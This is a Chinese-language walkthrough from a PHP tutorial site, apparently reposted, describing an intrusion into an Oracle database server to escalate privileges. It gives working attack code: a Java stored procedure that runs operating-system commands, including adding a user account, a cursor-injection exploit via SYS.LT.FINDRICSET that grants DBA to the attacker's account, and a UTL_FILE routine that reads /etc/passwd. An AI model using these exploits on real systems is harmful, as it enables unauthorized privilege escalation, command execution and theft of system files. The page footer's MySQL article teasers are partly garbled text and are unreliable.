入侵Oracle服务器进一步获取权限-mysql教程-PHP中文網

首頁

資料庫

mysql教程

入侵Oracle服务器进一步获取权限

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:56 PM

oracle資料庫

很快便连接上Oracle服务器，此时发现： 1.连接后不是dba权限 2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_

　　很快便连接上Oracle服务器，此时发现：

　　1.连接后不是dba权限

　　2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

　　3.运行SELECT UTL_HTTP.request(‘’) FROM dual 后发现oracle服务器不能连接网络。

　　幸运的是，

　　运行

　　create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

　　成功!这个用户具有create proceduce权限。

　　此时马上想到创建java扩展执行命令：

　　create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

　　begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘’, ‘execute’ );end;

　　create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

　　select * from all_objects where object_name like ‘%LINX%’

　　grant all on LinxRunCMD to public

　　select LinxRunCMD(‘cmd /c net user linx /add’) from dual

　　但是在第一步就卡住了，服务器由于某种未知原因不能创建java扩展!!

　　还好，我们还有UTL库可以利用：

　　create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

　　fHandler UTL_FILE.FILE_TYPE;

　　buf varchar2(4000);

　　output varchar2(8000);

　　BEGIN

　　fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

　　loop

　　begin

　　utl_file.get_line(fHandler,buf);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

　　exception

　　when no_data_found then exit;

　　end;

　　output := output||buf||chr(10);

　　end loop;

　　UTL_FILE.FCLOSE(fHandler);

　　return output;

　　END;

　　UTL_FILE_DIR需要先用：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　指定目。但运行后发现没有权限。只好想办法提权。

　　***************游标注射***************

　　老外写了N个pdf介绍这技术，，我精简了代码：

　　DECLARE

　　MYC NUMBER;

　　BEGIN

　　MYC := DBMS_SQL.OPEN_CURSOR;

　　DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

　　raise NO_DATA_FOUND;

　　EXCEPTION

　　WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　END;

　　运行后重新连接就有dba权限了，简单吧……

　　现在可以读取文件了：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　select LinxUTLReadfile(‘passwd’) from dual

　　后面就简单了，不写了。

linux

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

在MySQL中使用視圖的局限性是什麼？May 14, 2025 am 12:10 AM

mysqlviewshavelimitations：1）他們不使用Supportallsqloperations，限制DatamanipulationThroughViewSwithJoinsOrsubqueries.2）他們canimpactperformance，尤其是withcomplexcomplexclexeriesorlargedatasets.3）

確保您的MySQL數據庫：添加用戶並授予特權May 14, 2025 am 12:09 AM

porthusermanagementinmysqliscialforenhancingsEcurityAndsingsmenting效率databaseoperation.1）usecReateusertoAddusers，指定connectionsourcewith@'localhost'or@'％'。

哪些因素會影響我可以在MySQL中使用的觸發器數量？May 14, 2025 am 12:08 AM

mysqldoes notimposeahardlimitontriggers，butacticalfactorsdeterminetheireffactective：1）serverConfiguration impactactStriggerGermanagement; 2）複雜的TriggerSincreaseSySystemsystem load; 3）largertablesslowtriggerperfermance; 4）highConconcConcrencerCancancancancanceTigrignecentign; 5）; 5）

mysql：存儲斑點安全嗎？May 14, 2025 am 12:07 AM

Yes,it'ssafetostoreBLOBdatainMySQL,butconsiderthesefactors:1)StorageSpace:BLOBscanconsumesignificantspace,potentiallyincreasingcostsandslowingperformance.2)Performance:LargerrowsizesduetoBLOBsmayslowdownqueries.3)BackupandRecovery:Theseprocessescanbe

mySQL：通過PHP Web界面添加用戶May 14, 2025 am 12:04 AM

通過PHP網頁界面添加MySQL用戶可以使用MySQLi擴展。步驟如下：1.連接MySQL數據庫，使用MySQLi擴展。 2.創建用戶，使用CREATEUSER語句，並使用PASSWORD()函數加密密碼。 3.防止SQL注入，使用mysqli_real_escape_string()函數處理用戶輸入。 4.為新用戶分配權限，使用GRANT語句。

mysql：blob和其他無-SQL存儲，有什麼區別？May 13, 2025 am 12:14 AM

mysql'sblobissuitableForStoringBinaryDataWithInareLationalDatabase，而ilenosqloptionslikemongodb，redis和calablesolutionsolutionsolutionsoluntionsoluntionsolundortionsolunsonstructureddata.blobobobissimplobisslowdeperformberbutslowderformandperformancewithlararengedata;

mySQL添加用戶：語法，選項和安全性最佳實踐May 13, 2025 am 12:12 AM

toaddauserinmysql，使用：createUser'username'@'host'Indessify'password'; there'showtodoitsecurely：1）choosethehostcarecarefullytocon trolaccess.2）setResourcelimitswithoptionslikemax_queries_per_hour.3）usestrong，iniquepasswords.4）Enforcessl/tlsconnectionswith

MySQL：如何避免字符串數據類型常見錯誤？May 13, 2025 am 12:09 AM

toAvoidCommonMistakeswithStringDatatatPesInMysQl，CloseStringTypenuances，chosethirtightType，andManageEngencodingAndCollationsEttingSefectery.1）usecharforfixed lengengtrings，varchar forvariable-varchar forbariaible length，andtext/blobforlargerdataa.2 seterters seterters seterters

See all articles